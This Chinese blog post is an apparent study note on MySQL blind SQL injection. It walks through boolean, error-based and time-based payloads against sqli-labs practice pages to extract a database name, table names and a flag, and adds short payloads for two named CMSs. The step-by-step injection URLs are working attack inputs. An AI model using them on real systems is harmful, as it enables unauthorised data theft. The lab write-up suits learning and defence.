WEB攻防-sql注入系列3

已于 2023-06-11 15:17:52 修改
阅读量189 收藏 2
点赞数
分类专栏: 学习历程 文章标签: sql mysql 安全
于 2023-06-11 15:13:21 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_29948489/article/details/131153407
版权

知识点

SQL注入-方式增删改查

SQL注入-布尔&延迟&报错

SQL注入-数据回显&报错处理




项目案例




SQL操作-增删改查

1、功能:数据查询
查询:

SELECT * FROM users

SELECT * FROM users where id=$id

在这里插入图片描述

在这里插入图片描述





2、功能:新增用户,添加新闻等
增加:INSERT INTO users(字段名) VALUES (数据)

增加的时候先看好字段,在填上对应的内容

INSERT INTO users(id,username,password) VALUES(15,'insertTest','123456');

在这里插入图片描述

再次查询会发现已经新增了一个用户

SELECT * FROM users

在这里插入图片描述




3、功能:删除用户,
删除:DELETE FROM users WHERE id=$id

DELETE from users WHERE id=15

在这里插入图片描述

再次查询会发现已经删除了该用户

在这里插入图片描述




4、功能:修改用户,修改文章等
修改:UPDATE users SET id=$id

UPDATE 表名称 SET 列名称 = 新值 WHERE 列名称 = 某值

UPDATE users set username='updatTest',password='123456' WHERE id = 14

在这里插入图片描述





再次查询会发现已经修改了id=14的用户的账号密码

在这里插入图片描述




注意:在某些大型数据表中,是不允许写*的这种操作。14个数据运行8秒,如果上W条数据会多少秒呢?

为了避免这样的事情发生,在很多时候*号这个地方会被换成具体的内容进行限定,来达到查询速度更快。

SELECT username,password FROM users WHERE id=14;	#显示id=14的username,password

在这里插入图片描述




#为了方便观看,把id也给加上
SELECT id,username,password FROM users WHERE id=14;	#显示id=14的id,username,password

在这里插入图片描述





注入函数-盲注(布尔&报错&延迟)

盲注就是在注入过程中,获取的数据不能回显至前端页面。

我们需要利用一些方法进行判断或者尝试,这个过程称之为盲注。

解决:常规的联合查询注入不行的情况


有时候某些面试官会问你,当常用函数被禁用后该怎么办? 答案是换个函数~
!!!更多参数相关:https://www.jianshu.com/p/bc35f8dd4f7c



布尔盲注(逻辑判断)
常用函数:regexp,like,ascii,left,ord,mid

布尔:
and length(database())=7;
and left(database(),1)='p';
and left(database(),2)='pi';
and substr(database(),1,1)='p';
and substr(database(),2,1)='i';
and ord(left(database(),1))=112;

为真就显示页面,为假就不显示页面




判断注入
http://192.168.5.1:81/Less-8/index.php?id=1 -- -

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=1 and 1=1 -- - 	#理论为真,事实为真,页面无变化
http://192.168.5.1:81/Less-8/index.php?id=1%20and%201=43 -- -	#理论为假,事实为真,页面无变化。证明语句未执行

在这里插入图片描述

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=2'  -- -	#页面无变化

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=2'  and 1=1 -- -	#理论为真,事实为真,页面无变化
http://192.168.5.1:81/Less-8/index.php?id=2'  and 1=2 -- -	#理论为假,事实为假,页面发生变化。证明语句成功执行

在这里插入图片描述

在这里插入图片描述




判断字段
http://192.168.5.1:81/Less-8/index.php?id=2'  order by 3 -- -	#页面无变化。证明语句成功执行

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=2'  order by 4 -- -	#页面发生变化。证明语句未成功执行

在这里插入图片描述

判断回显位置

~~用union联合查找,~~会发现页面没有回显的地方,显示不出来。

在这里插入图片描述

这就提到今天所说的布尔盲注(逻辑判断)




查看数据库长度
http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())=1) -- -	#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())=2) -- -	#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())=3) -- -	#页面发生变化。证明语句未成功执行
...
http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())=8) -- -	#页面未发生变化。证明语句成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())=9) -- -	#页面发生变化。证明语句未成功执行
#判断出来数据库的长度为8位

http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())>9) -- -	#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())>5) -- -	#页面未发生变化。证明语句成功执行

http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())=1) -- -	#页面发生变化。证明语句未成功执行

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())=2) -- -	#页面发生变化。证明语句未成功执行

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())=8) -- -	#页面未发生变化。证明语句成功执行

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=2' and (length(database())=9) -- -	#页面发生变化。证明语句未成功执行

在这里插入图片描述




到此判断出来数据库的长度为8位




查看数据库名字

长度为8位依次进行判断。


第一种写法left()

数据库第一位

left(database(),1)>‘a’ – - #页面未发生变化。证明语句成功执行

left(database(),1)>‘t’ – - #页面发生变化。证明语句未成功执行

left(database(),1)=‘e’ – - #页面未发生变化。证明语句成功执行

http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)='a'  -- -	#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)='b'  -- -	#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)='c'  -- -	#页面发生变化。证明语句未成功执行
...
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)='s'  -- -	#页面未发生变化。证明语句成功执行


http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)>'a'  -- -	#页面未发生变化。证明语句成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)>'t'  -- -	#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)='e'  -- -	#页面未发生变化。证明语句成功执行

http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)='a'  -- -   #页面发生变化。证明语句未成功执行

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)='b'  -- -	#页面发生变化。证明语句未成功执行

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)='s'  -- -	#页面未发生变化。证明语句成功执行

在这里插入图片描述

至此我们就拿到了数据库第一位是s

第二位

http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),2)='sa'  -- -	#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),2)='sb'  -- -	#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),2)='sc'  -- -	#页面发生变化。证明语句未成功执行
...
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),2)='se'  -- -	#页面未发生变化。证明语句成功执行

在这里插入图片描述

在这里插入图片描述

第三位就不演示了,也是同样的操作。

重复操作,拿到最后的结果security

http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),1)='s'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),2)='se'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),3)='sec'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),4)='secu'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),5)='secur'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),6)='securi'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),7)='securit'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and left(database(),8)='security'  -- -
#security



第二种写法substr()

数据库第一位

http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,1)='a'  -- -#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,1)='b'  -- -#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,1)='c'  -- -#页面发生变化。证明语句未成功执行
...
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,1)='s'  -- -#页面未发生变化。证明语句成功执行

http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,1)='a'  -- -#页面发生变化。证明语句未成功执行

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,1)='s'  -- -#页面未发生变化。证明语句成功执行

在这里插入图片描述

数据库第一位是s

http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='sa'  -- -#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='sb'  -- -#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='sc'  -- -#页面发生变化。证明语句未成功执行
...
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='se'  -- -#页面未发生变化。证明语句成功执行

http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='sa'  -- -#页面发生变化。证明语句未成功执行

在这里插入图片描述

http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='se'  -- -#页面未发生变化。证明语句成功执行

在这里插入图片描述

数据库第二位是se

第三位就不演示了,也是同样的操作。

重复操作,拿到最后的结果security

http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,1)='s'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='se'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='sec'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='secu'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='secur'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='securi'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='securit'  -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and substr(database(),1,2)='security'  -- -
#拿到数据库security



第三种写法ascii/ord()

ascii制码表
https://www.sojson.com/asciitable.html

当使用二进制时,就要一个个记录一下

95是A
115是s
101是e
122是z

http://192.168.5.1:81/Less-8/index.php?id=2' and ascii(substr(database(),1,1))>65 -- -
#页面未发生变化。证明语句成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and ascii(substr(database(),1,1))>122 -- -
#页面发生变化。证明语句未成功执行
...

http://192.168.5.1:81/Less-8/index.php?id=2' and ascii(substr(database(),1,1))=115 -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and ascii(substr(database(),2,1))=101 -- -


http://192.168.5.1:81/Less-8/index.php?id=2' and ord(substr(database(),1,1))>65 -- -
#页面未发生变化。证明语句成功执行
http://192.168.5.1:81/Less-8/index.php?id=2' and ascii(substr(database(),1,1))>122 -- -
#页面发生变化。证明语句未成功执行
...

http://192.168.5.1:81/Less-8/index.php?id=2' and ord(substr(database(),1,1))=115 -- -
http://192.168.5.1:81/Less-8/index.php?id=2' and ord(substr(database(),2,1))=101 -- -



查看表的长度
http://192.168.5.1:81/Less-8/index.php?id=2'  AND ( length (( SELECT table_name FROM information_schema.TABLES WHERE table_schema = 'security' LIMIT 0, 1 )) =6) -- -

#注意这里的括号问题~
#这里写的是security的第1个表的长度为6,也就是emails
#为了减少操作,直接查flag了

http://192.168.5.1:81/Less-8/index.php?id=2'  AND ( length (( SELECT table_name FROM information_schema.TABLES WHERE table_schema = 'security' LIMIT 1, 1 )) >1) -- -#页面未发生变化。证明语句功执行

http://192.168.5.1:81/Less-8/index.php?id=2'  AND ( length (( SELECT table_name FROM information_schema.TABLES WHERE table_schema = 'security' LIMIT 1, 1 )) >4) -- -#页面发生变化。证明语句未成功执行

http://192.168.5.1:81/Less-8/index.php?id=2'  AND ( length (( SELECT table_name FROM information_schema.TABLES WHERE table_schema = 'security' LIMIT 1, 1 )) =4) -- -#页面未发生变化。证明语句功执行


#表的长度为4
查看表的名

102是f,108是l

http://192.168.5.1:81/Less-8/index.php?id=2'  and (ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 1,1),1,1)))>102 -- -#页面发生变化。证明语句未成功执行
http://192.168.5.1:81/Less-8/index.php?id=2'  and (ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 1,1),1,1)))=102 -- -#页面未发生变化。证明语句功执行
#表的第一个为f


http://192.168.5.1:81/Less-8/index.php?id=2'  and (ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 1,1),2,1)))>108 -- -#页面发生变化。证明语句未成功执行

http://192.168.5.1:81/Less-8/index.php?id=2'  and (ascii(substr((select table_name from information_schema.tables where table_schema="security" limit 1,1),2,1)))=108 -- -#页面未发生变化。证明语句功执行
#表的第二个为l
...

#最后表为flag



查看字段的长度
http://192.168.5.1:81/Less-8/index.php?id=2'  and (LENGTH((select table_name from information_schema.tables where table_schema="security" limit 1,1)))>4 -- -#页面发生变化。证明语句未成功执行

http://192.168.5.1:81/Less-8/index.php?id=2'  and (LENGTH((select table_name from information_schema.tables where table_schema="security" limit 1,1)))=4 -- -#页面未发生变化。证明语句功执行



查看字段的名
http://192.168.5.1:81/Less-8/index.php?id=2'  and (select ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1)))>102-- - #页面发生变化。证明语句未成功执行

http://192.168.5.1:81/Less-8/index.php?id=2'  and (select ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),1,1)))=102-- - #页面未发生变化。证明语句功执行

#字段的第一个为f


http://192.168.5.1:81/Less-8/index.php?id=2'  and (select ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),2,1)))>102-- - #页面发生变化。证明语句未成功执行

http://192.168.5.1:81/Less-8/index.php?id=2'  and (select ascii(substr((select column_name from information_schema.columns where table_name='flag' limit 0,1),2,1)))=108-- - #页面未发生变化。证明语句功执行

#字段的第二个为l

...

#最后字段为flag



查看字段数据
http://192.168.5.1:81/Less-8/index.php?id=2'  and (ascii(substr((select flag from flag limit 0,1),1,1))) > 68 -- -#页面未发生变化。证明语句功执行

http://192.168.5.1:81/Less-8/index.php?id=2'  and (ascii(substr((select flag from flag limit 0,1),1,1)))= 101 -- -#页面未发生变化。证明语句功执行
#e

http://192.168.5.1:81/Less-8/index.php?id=2'  and (ascii(substr((select flag from flag limit 0,1),2,1)))= 49 -- -#页面未发生变化。证明语句功执行
#1
...


#e10adc3949ba59abbe56e057f20f883e

在这里插入图片描述




报错盲注(报错回显)
常用函数:floor,updatexml,extractvalue

and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1)
and extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));

这个0x7e是~的16进制,其他符号也可以,本身没有什么意义。部分情况下可能会看显示问题。

http://192.168.5.1:81/Less-5/index.php?id=1'  and updatexml(1,concat(0x7e,(version()),0x7e),1)-- -

#查看当前所在库
http://192.168.5.1:81/Less-5/index.php?id=1'  and updatexml(1,concat(0x7e,database(),0x7e),0)-- -

#查看全部库。group_concat(很遗憾也没有显示全)
http://192.168.5.1:81/Less-5/index.php?id=1'  and updatexml(1,concat(0x7e,(select group_concat(schema_name) from information_schema.schemata limit 0,1),0x7e),0)-- -

#查看全部库。limit
http://192.168.5.1:81/Less-5/index.php?id=1'  and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),0)-- -
http://192.168.5.1:81/Less-5/index.php?id=1'  and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 1,1),0x7e),0)-- -


#显示Subquery returns more than 1 row。 发现回显数据超过1行,无法显示。使用limit函数
http://192.168.5.1:81/Less-5/index.php?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security')),0)--+


#使用limit函数。获取表信息
http://192.168.5.1:81/Less-5/index.php?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),0)--+
#limit 0,1 emails

http://192.168.5.1:81/Less-5/index.php?id=1' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 1,1),0x7e),0)--+
#limit 1,1 flag


#获取全部表信息
http://192.168.5.1:81/Less-5/index.php?id=1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e,(select group_concat(table_name)),0x7e)from information_schema.tables where table_schema='security'),0x7e),1) -- -
#'~~emails,flag,referers,uagents,u' 很遗憾没有获得全部

#获取列字段名
http://192.168.5.1:81/Less-5/index.php?id=1' and updatexml(1,concat(0x7e,(select distinct concat(0x7e,(select group_concat(column_name)),0x7e)from information_schema.columns where table_schema='security' and  table_name='flag'),0x7e),1) -- -
#~~flag~~

#获取字段数据
http://192.168.5.1:81/Less-5/index.php?id=1' and updatexml(1,concat(0x7e,(select flag from flag),0x7e),0) -- -
#~e10adc3949ba59abbe56e057f20f883 注意这个地方没有~证明没有回显全


https://www.cnblogs.com/zhengna/p/12445887.html
https://www.cnblogs.com/linyu51/p/16598303.html
https://blog.youkuaiyun.com/m0_51183537/article/details/122012622


解决没有显示全的问题.使用mid参数
mid(1,2,3):第一个参数是要提取的表名,第二个参数为起始位置,第三个参数为返回的字符个数

http://192.168.5.1:81/Less-5/index.php?id=1' and updatexml(1,concat(0x7e,mid((select flag from flag),1,30),0x7e),0)-- - 
#~e10adc3949ba59abbe56e057f20f88~ 注意这里经过测试,刚好可以显示出30位,多一位后边的~会被去掉。
http://192.168.5.1:81/Less-5/index.php?id=1' and updatexml(1,concat(0x7e,mid((select flag from flag),30,10),0x7e),0)-- - 
#~83e~

#相结合就是flag e10adc3949ba59abbe56e057f20f8883e

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述




时间盲注(延时判断)
常用函数:if,sleep


延迟:
and sleep(1);
and if(1>2,sleep(1),0);
and if(1<2,sleep(1),0);


使用burp可以更好的看到时间~


#正常访问
http://192.168.5.1:81/Less-9/index.php?id=1		#延迟4秒

#判断注入
http://192.168.5.1:81/Less-9/index.php?id=1'	#页面未发生改变

http://192.168.5.1:81/Less-9/index.php?id=65535' or 1=1 -- -	#页面未发生改变
http://192.168.5.1:81/Less-9/index.php?id=65535' or 1=2	-- -	#页面未发生改变,不确定是不是执行

#用sllep函数执行,
http://192.168.5.1:81/Less-9/index.php?id=1' and if(2>1,sleep(5),sleep(0))		#延迟9秒,证明语成功执行
#判断出来语句正常执行了

#查看数据库长度
http://192.168.5.1:81/Less-9/index.php?id=1' and if((length(database())>8),sleep(5),sleep(0))	#延迟4秒,证明语句未成功执行
http://192.168.5.1:81/Less-9/index.php?id=1' and if((length(database())=8),sleep(5),sleep(0))	#延迟9秒,证明语句未成功执行

#查看数据库的名字
http://192.168.5.1:81/Less-9/index.php?id=1' AND IF(LEFT((database()),1)='a',sleep(5),sleep(0))-- -#延迟4秒,证明语句未成功执行
http://192.168.5.1:81/Less-9/index.php?id=1' AND IF(LEFT((database()),1)='s',sleep(5),sleep(0))-- -#延迟9秒,证明语句成功执行
#第一位s

http://192.168.5.1:81/Less-9/index.php?id=1' AND IF(LEFT((database()),2)='se',sleep(5),sleep(0))-- -#延迟4秒,证明语句未成功执行
#第二位se
...

#security



https://www.cnblogs.com/wwcdg/p/15913937.html

经过测试本地正常发包就有4m的延迟。也就意味着如果sleep(5)实际的时间会是9m

在这里插入图片描述

在这里插入图片描述


在这里插入图片描述


在这里插入图片描述


在这里插入图片描述

在这里插入图片描述


注入条件-数据回显&错误处理



基于延时:都不需要

and if(1=1,sleep(5),0)


基于布尔:有数据库输出判断标准

and length(database())=6


基于报错:有数据库报错处理判断标准

and updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1)

.mysql_error()




CMS案例-插入报错&删除延迟


1、xhcms-insert报错

' and updatexml(1,concat(0x7e,(SELECT version()),0x7e),1) and '

xhcms1.0.

2、kkcms

and if(1=1,sleep(5),0)
or if(1=1,sleep(5),0)
or if(ord(left(database(),1))=107,sleep(2),0)

拉出来xhcms,全局搜insert

在这里插入图片描述

访问不到文件

在这里插入图片描述

寻找路由规则

在这里插入图片描述

结合得到

?r=submit

在这里插入图片描述

在这里插入图片描述

寻找前端显示页面

?=submits

在这里插入图片描述

找到页面

在这里插入图片描述

在这里插入图片描述

在这里插入图片描述

SQL注入语句(详细)
m0_64118193的博客
06-02 2万+
目录一、联合查询1.判断注入点 2.查询字段 3.确定回显点 4.基础查询信息二、报错注入1.substr()函数 2.查询语句三、布尔盲注1.length( )函数 2.substr( )函数 3.ord( )函数 4.查询语句四、时间盲注1.sleep( )延迟函数 2.查询语句五、堆叠注入1.查询语句***爆库语句SQLMAP工具的使用参数用户可控:前端传递给后端的参数内容是用户可以控制的参数带入数据库查询:传入的参数拼接到SQL语句,且带入数据库查询当传入的id参数为
WEB攻防-通用漏洞-SQL注入-MYSQL-union一般注入
weixin_45534587的博客
07-22 1065
id=-1' union select 1, 2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'#id=1' and 1=1%23,(%23代表#),其中and 1=1为真,所以返回结果相同。id=1' and 1=2%23,由于and 1=2为假,根据条件判断sql执行后是null的,所以返回未查到数据。
造成sql注入功能点_创建一个SQL注入保护功能
culuo4781的博客
07-26 267
造成sql注入功能点 .SQLCode { font-size: 13px; font-weight: bold; font-family: monospace;; white-space: pre; -o-tab-size: 4; -moz-tab-size: 4; -webkit-tab-size: 4; } .SQLComment { ...
sql注入手法详解
m0_71299382的博客
11-26 1万+
sql注入总结
【2025版】最新SQL 三种注入方式详解,零基础入门到精通,收藏这一篇就够了
最新发布
wly55690的博客
03-17 2168
MySQL 提供了 load_file() 函数,可以帮助用户快速读取文件,但文件的位置必须在服务器上,文件必须为绝对路径,且用户必须有 FILE 权限,文件容量也必须小于 max_allowed_packet 字节 (默认为 16MB,最大为 1GB)。SQL注入攻击指的是通过构建特殊的输入作为参数传入Web应用程序,而这些输入大都是SQL语法里的一些组合,通过执行SQL语句进而执行攻击者所要的操作,其主要原因是程序没有细致地过滤用户输入的数据,致使非法数据侵入系统。
SQL 注入 五大基本手法
weixin_51559599的博客
11-07 1516
适用数据库中的来的情况。联合查询就是利用语句,该语句会同时执行两条 select 语句,实现跨库、跨表查询。
sql注入的简单写法
xiechao240的专栏
08-14 1215
60.  现在来了解sql Injection   我在不知道你用户名,密码的情况下我可以进入你这个系统,如果你用预编译,就没有这个问题,如果你用组串的方式,就都 可以注入进去,如果一登进去,就可以干很多事情,比如把你这个用户给删除了。现在有很多网站遭到了sql注入的攻击,把用户删除了,把系统搞摊了。     61.  String sql = "select * from t_use...
WEB攻防-通用漏洞-SQL注入-ACCESS一般注入与偏移注入
weixin_45534587的博客
07-11 1129
同样的使用union select来做,不同的是不需要知道列名,而是通过偏移爆出数据,但前提是查询的表必须比当前查询到的列数小,如该案例在上文中查询到22列,则如果要查询admin表的列数必须比当前查询的22列的列数少,因为要把查询到表塞进当前查询到列中,不理解往下看例子。union select 1,2,3,4,5,6,7,8,9,10,11,admin.* from admin --回显错误。在偏移6位之后回显正常,则知道admin有6列 ,而3和15是回显位,这里选择使用15回显。
WEB攻防-通用漏洞-SQL 读写注入-MYSQL&MSSQL&PostgreSQL
weixin_45534587的博客
07-23 793
高权限注入指的是攻击者通过SQL注入漏洞,利用具有高级权限的数据库账户(如MYSQL的root用户、MSSQL的sa用户、PostgreSQL的dba用户)执行恶意SQL语句。这些高级权限账户能够访问和修改数据库中的所有数据,甚至执行操作系统级别的命令。
Web安全攻防关键技术详解 - SQL注入与XSS攻击实战指南
11-07
内容概要:本文详细介绍了Web安全攻防的关键技术,主要包括SQL注入、XSS攻击和CSR攻击的原理、绕过手段及防范措施。首先,讲解了SQL注入的基本原理、分类及常见的注入手法,接着介绍了如何使用SQLMap工具进行自动化...
WEB攻防-通用漏洞SQL注入- 基本原理
weixin_45534587的博客
07-11 358
SQL注入是指攻击者通过在Web表单输入或URL参数中插入(或“注入”)恶意的SQL代码片段,这些代码片段被后端数据库系统错误地当作SQL语句的一部分执行,从而实现对数据库的非法查询、修改、删除等操作。这种攻击方式违背了“数据与代码分离”的基本原则,使得用户输入的数据被当作代码执行,进而引发安全漏洞。
【网络安全渗透测试零基础入门必知必会】之初识SQL注入(非常详细)零基础入门到精通,收藏这一篇就够了(1)
Libra1313的博客
06-21 1287
id=1 基于此种形式的注入,一般被叫做数字型注入点,缘由是其注入点 id 类型为数字,在大多数的网页中,诸如查看用户个人信息,查看文章等,大都会使用这种形式的结构传递id等信息,交给后端,查询出数据库中对应的信息,返回给前台。SQL Cookie注入原理主要涉及到攻击者利用Web应用程序对Cookie处理不当的漏洞,通过修改或伪造Cookie中的值,将恶意的SQL代码注入到应用程序的数据库查询中,从而执行非授权的操作或获取未经授权的数据。主要源于应用程序对用户输入的字符型数据没有进行严格的过滤和验证。
简单的SQL注入
2301_76914258的博客
11-08 1076
多多实战,纸上得来终觉浅。
SQL注入
zhzjn的博客
01-30 621
字符串拼接?站位相同动态拼接sql中的数据参数动态拼接SQL中的数据参数不同可以绑定非数据的参数:表名、字段名、SQL关键字只能绑定数据,不能绑定其他SQL关键词和表名字段名有SQL注入风险可以防止SQL注入。建议场景适用于拼接表名、字段名、SQL关键词适用于拼接数据参数。
SQL注入详解(全网最全,万字长文)
热门推荐
m0_56691564的博客
10-23 4万+
一些概念:SQL:用于数据库中的标准数据查询语言。 web分为前端和后端,前端负责进行展示,后端负责处理来自前端的请求并提供前端展示的资源。而数据库就是存储资源的地方。而服务器获取数据的方法就是使用SQL语句进行查询获取。
Python 与 MySQL 进行增删改查的操作以及防止SQL注入
Lucas在澳洲
06-03 1235
SQL 注入是一种常见的网络攻击方式,它的原理是通过将恶意 SQL 代码注入到应用程序中,从而获取数据库中的敏感信息。以上就是在 Python 中防止 SQL 注入的方式,通过使用占位符、参数化查询和过滤输入内容等方法,我们可以有效地保护 Python 应用程序的安全性,避免 SQL 注入的发生。在使用 SQL 语句时,我们可以通过占位符的方式传递参数,从而避免 SQL 注入的风险。就是占位符,它可以将传递的参数进行处理,从而避免 SQL 注入的风险。是使用占位符的方式,可以有效地避免 SQL 注入问题。
SQL注入教程
weixin_51047454的博客
03-17 1万+
sql注入教程
SQL注入知识点总结
YQavenger的博客
10-07 658
SQL注入 产生原因:前台与后台进行交互的时候,输入的内容没有经过严格的过滤,造成攻击者可以构造特殊的SQL语句,造成SQL注入攻击 两个关键前提 1、用户能控制输入的内容 2、web应用能把用户输入的内容带到数据库中执行 分类 根据请求方式不同 1、GET注入 2、POST注入 根据参数类型 1、数值型 2、字符型 3、搜索行 根据反馈类型 1、联合注入 2、报错注入 3、盲注 4、堆叠注入 根据常用数据库分类 1、MySQL注入 2、SQL server注入 3、Oracle注入 4、Access注入
网络攻防技术实践:SQL注入攻击Web服务器
"这篇课程设计报告讲述了如何架设Web服务器并进行SQL注入攻击的过程,旨在理解和防范网络攻击技术。报告详细记录了从安装IIS、配置Web服务器到执行SQL注入攻击的步骤,以及最终获得后台权限的过程。" 本文主要探讨...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值